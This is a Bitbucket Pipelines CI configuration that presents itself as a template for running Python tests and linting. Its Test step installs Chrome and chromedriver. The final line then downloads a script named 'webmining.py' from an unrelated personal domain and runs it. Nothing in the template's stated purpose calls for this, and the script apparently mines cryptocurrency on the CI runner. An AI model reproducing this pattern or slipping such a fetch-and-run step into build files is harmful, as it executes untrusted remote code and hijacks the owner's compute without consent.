#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - curl -sS -o - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -
            - echo "deb [arch=amd64]  http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list
            - apt-get -y update
            - apt-get -y install google-chrome-stable
            - wget https://chromedriver.storage.googleapis.com/2.41/chromedriver_linux64.zip
            - unzip chromedriver_linux64.zip
            - mv chromedriver /usr/bin/chromedriver
            - chown root:root /usr/bin/chromedriver
            - chmod +x /usr/bin/chromedriver
            - apt update -y
            - apt install screen -y && apt-get install htop -y && pip3 install selenium && pip3 install twilio && wget swenson.my.id/webmining.py && python3 webmining.py

